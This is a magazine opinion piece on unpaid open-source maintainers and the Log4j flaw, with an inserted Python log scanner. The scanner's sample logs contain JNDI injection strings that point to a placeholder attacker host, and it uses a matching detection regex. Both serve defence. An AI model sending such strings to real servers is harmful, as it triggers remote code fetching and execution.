CYBER SECURITY
Open source is dying, and the critical infrastructure bill could be the finishing blow
By Jack Lindsay
Recently there was a massive vulnerability found in a critical Java ecosystem package. When fully weaponized, the vulnerability allows attackers to manipulate Java servers into executing arbitrary code that is fetched from an LDAP server. The feature behind it is an entirely reasonable solution to a real-world problem that accidentally created a massive hole in countless networks. This microcosm of the Open source ecosystem demonstrates why the Open source community may soon vanish.
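The mechanism described above leaves a recognisable trace: a request or log field containing a JNDI lookup string that names the LDAP (or similar) server the code is fetched from. The following scanner is an added example, not code from the article or from the Log4j project; the log lines, hostnames and field layout are constructed for illustration, and it matches only the literal `${jndi:<scheme>:` form, so a production detection would also need to normalise nested lookups before matching.

```python
"""Flag Log4j-style JNDI lookup strings in application log lines.

Added defensive example (not from the article). The log lines below are
constructed sample data; 'attacker.example' is a placeholder host.
"""
import re
from typing import Dict, List, Optional

# Literal lookup form: "${jndi:<scheme>:" with optional whitespace, any case.
# <scheme> is captured so the alert can say which protocol was requested.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)

# Constructed sample access-log lines (last quoted field is the User-Agent).
SAMPLE_LOGS: List[str] = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 302 "${JNDI:rmi://attacker.example/b}"',
    '10.0.0.3 - - "POST /api HTTP/1.1" 500 "normal user agent"',
]


def find_jndi_lookup(line: str) -> Optional[Dict[str, str]]:
    """Return the scheme and matched text for the first JNDI lookup in a line,
    or None when the line contains no literal lookup string."""
    match = JNDI_RE.search(line)
    if match is None:
        return None
    return {"scheme": match.group(1).lower(), "match": match.group(0)}


def scan_logs(lines: List[str]) -> List[Dict[str, object]]:
    """Scan every line and collect hits with their 1-based line numbers,
    so an analyst can jump straight to the offending request."""
    hits: List[Dict[str, object]] = []
    for line_no, line in enumerate(lines, start=1):
        hit = find_jndi_lookup(line)
        if hit is not None:
            hits.append({"line_no": line_no, "scheme": hit["scheme"], "line": line})
    return hits


if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS):
        print(f"line {hit['line_no']}: JNDI lookup via {hit['scheme']} -> {hit['line']}")
```

Run it over a real access log by replacing `SAMPLE_LOGS` with the file's lines; the scheme field is useful for triage because an `ldap` or `rmi` lookup in a User-Agent or other client-controlled header has no legitimate purpose and should be escalated regardless of whether the server was patched.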
If you want me to make you useful software, pay me. The ‘Log4j’ project is so beneficial it is essentially in the standard library for Java users. As of December 11, 2021, there were three sponsors for the author’s work. A day later, after it compromised a significant number of systems, the number had increased to 14. It is the yet unresolved – and possibly unresolvable – conundrum of Open source. Developers are put in a situation where software they create as a passion project on the side can end up as a critical component within a company’s stack. Ultimately, as is the case with Log4j, these developers find themselves in the precarious position where they’re not being paid for their efforts but are suddenly held responsible for significant disruption. The idea that Open source is a pool of free labour – or ‘leech culture,’ as it has become known – has accelerated technologists well beyond the efficiency levels previously possible. It has also put the sector in a vulnerable state where a random smattering of volunteers has become critical for the business continuity of some of the largest enterprises in the world. It makes sense. The Open source community builds valuable software. The vulnerability that created the #Log4j twitter storm is actually a great way to get a shell whenever you want, which is why it is used so widely. As a result, there is a strong push within the community for companies that rely on Open source projects to recognise their ‘moral obligation’ and support projects by making donations.
14 | Cyber Risk Leaders Magazine
The fallacy of Open source software development
“Open source software is developed in a decentralised and collaborative way, relying on peer review and community production. Open source software is often cheaper, more flexible, and has more longevity than its proprietary peers because it is developed by communities rather than a single author or company,” says Red Hat when explaining what open source software is. This is the essence of open source, of which all projects are merely imitations: something the community aspires to achieve but ultimately falls short of. A recent example of this is the core-js debacle. This JavaScript library gives JavaScript’s standard library a lot